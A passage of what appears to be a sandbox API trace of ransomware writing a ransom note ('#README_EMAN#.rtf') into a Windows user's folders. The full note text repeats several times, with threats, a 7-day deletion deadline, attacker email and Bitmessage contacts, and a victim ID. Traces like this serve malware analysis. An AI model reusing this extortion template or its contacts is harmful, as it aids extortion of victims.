n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.122] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n¨C\x0e\x08¸´ês©&\n1\x02#ý{z£d-º°\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0300.122] WriteFile (in: hFile=0x2d4, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0300.122] CloseHandle (hObject=0x2d4) returned 1 [0300.122] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ru\\#readme_eman#.rtf")) returned 0xffffffff [0300.122] GetLastError () returned 0x2 [0300.122] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ru\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0300.123] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.123] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 